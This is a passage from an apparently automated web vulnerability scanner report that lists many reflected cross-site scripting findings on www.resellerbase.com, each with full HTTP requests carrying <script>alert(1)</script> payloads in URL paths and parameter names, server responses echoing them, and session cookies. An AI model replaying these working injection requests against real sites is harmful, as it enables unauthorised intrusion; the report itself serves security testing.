This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/3948b9d<script>alert(1)</script>6ebda9e4a27a6a35a/rating.php?id=39&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3948b9d<script>alert(1)</script>6ebda9e4a27a6a35a/rating.php?id=39&rating=5 was not found on this server.</p>
...[SNIP]...

2.2645. http://www.resellerbase.com/detail/39/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1954<script>alert(1)</script>27dace852da14511d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/39/rating.phpb1954<script>alert(1)</script>27dace852da14511d?id=39&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/rating.phpb1954<script>alert(1)</script>27dace852da14511d?id=39&rating=5 was not found on this server.</p>
...[SNIP]...

2.2646. http://www.resellerbase.com/detail/39/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52fd2<script>alert(1)</script>074911faa4a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/rating.php52fd2<script>alert(1)</script>074911faa4a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/rating.php52fd2<script>alert(1)</script>074911faa4a was not found on this server.</p>
...[SNIP]...

2.2647. http://www.resellerbase.com/detail/39/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 365d7<script>alert(1)</script>3d378e747fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/rating.php?365d7<script>alert(1)</script>3d378e747fa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/rating.php?365d7<script>alert(1)</script>3d378e747fa=1 was not found on this server.</p>
...[SNIP]...

2.2648. http://www.resellerbase.com/detail/39/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3a0f5<script>alert(1)</script>4f7158e6b71ec8888 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/39/rating.php/3a0f5<script>alert(1)</script>4f7158e6b71ec8888?id=39&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/rating.php/3a0f5<script>alert(1)</script>4f7158e6b71ec8888?id=39&rating=5 was not found on this server.</p>
...[SNIP]...

2.2649. http://www.resellerbase.com/detail/39/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78a85<script>alert(1)</script>b466006986d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail78a85<script>alert(1)</script>b466006986d/39/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail78a85<script>alert(1)</script>b466006986d/39/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2650. http://www.resellerbase.com/detail/39/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 29a67<script>alert(1)</script>1ba91f585d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3929a67<script>alert(1)</script>1ba91f585d8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3929a67<script>alert(1)</script>1ba91f585d8/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2651. http://www.resellerbase.com/detail/39/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ba2c9<script>alert(1)</script>67fe49afd61 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/search.phpba2c9<script>alert(1)</script>67fe49afd61?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/search.phpba2c9<script>alert(1)</script>67fe49afd61?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2652. http://www.resellerbase.com/detail/39/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 63162<a>0ad7bb11d72 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/search.php?keyword=search...&Submit3=Search63162<a>0ad7bb11d72&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/search.php?keyword=search...&Submit3=Search63162<a>0ad7bb11d72&opt=2 was not found on this server.</p>
...[SNIP]...

2.2653. http://www.resellerbase.com/detail/39/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c377c<a>7698aadf203 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/search.php?keyword=search...c377c<a>7698aadf203&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/search.php?keyword=search...c377c<a>7698aadf203&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2654. http://www.resellerbase.com/detail/39/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6e869<script>alert(1)</script>382c771853d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/search.php?keyword=search...&Submit3=Search&opt=2&6e869<script>alert(1)</script>382c771853d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/search.php?keyword=search...&Submit3=Search&opt=2&6e869<script>alert(1)</script>382c771853d=1 was not found on this server.</p>
...[SNIP]...

2.2655. http://www.resellerbase.com/detail/39/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/39/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 496e8<a>12b71569d8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/search.php?keyword=search...&Submit3=Search&opt=2496e8<a>12b71569d8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/webcams-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/search.php?keyword=search...&Submit3=Search&opt=2496e8<a>12b71569d8 was not found on this server.</p>
...[SNIP]...

2.2656. http://www.resellerbase.com/detail/39/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 402aa<script>alert(1)</script>22e32bba20f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail402aa<script>alert(1)</script>22e32bba20f/39/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail402aa<script>alert(1)</script>22e32bba20f/39/themes/ was not found on this server.</p>
...[SNIP]...

2.2657. http://www.resellerbase.com/detail/39/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b84c3<script>alert(1)</script>6c68632eaaf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39b84c3<script>alert(1)</script>6c68632eaaf/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39b84c3<script>alert(1)</script>6c68632eaaf/themes/ was not found on this server.</p>
...[SNIP]...

2.2658. http://www.resellerbase.com/detail/39/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f6801<script>alert(1)</script>72aa5856366 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themesf6801<script>alert(1)</script>72aa5856366/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themesf6801<script>alert(1)</script>72aa5856366/ was not found on this server.</p>
...[SNIP]...

2.2659. http://www.resellerbase.com/detail/39/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e1365<script>alert(1)</script>0aca5078e2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/?e1365<script>alert(1)</script>0aca5078e2e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/?e1365<script>alert(1)</script>0aca5078e2e=1 was not found on this server.</p>
...[SNIP]...

2.2660. http://www.resellerbase.com/detail/39/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c23b0<script>alert(1)</script>79d1103fdc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc23b0<script>alert(1)</script>79d1103fdc0/39/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc23b0<script>alert(1)</script>79d1103fdc0/39/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2661. http://www.resellerbase.com/detail/39/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0e9d<script>alert(1)</script>3a58a6b4c8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39c0e9d<script>alert(1)</script>3a58a6b4c8f/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39c0e9d<script>alert(1)</script>3a58a6b4c8f/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2662. http://www.resellerbase.com/detail/39/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 51457<script>alert(1)</script>2fdab892aa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes51457<script>alert(1)</script>2fdab892aa0/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes51457<script>alert(1)</script>2fdab892aa0/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2663. http://www.resellerbase.com/detail/39/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/39/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7625a<script>alert(1)</script>27e08d48dcf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/kosmos7625a<script>alert(1)</script>27e08d48dcf/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

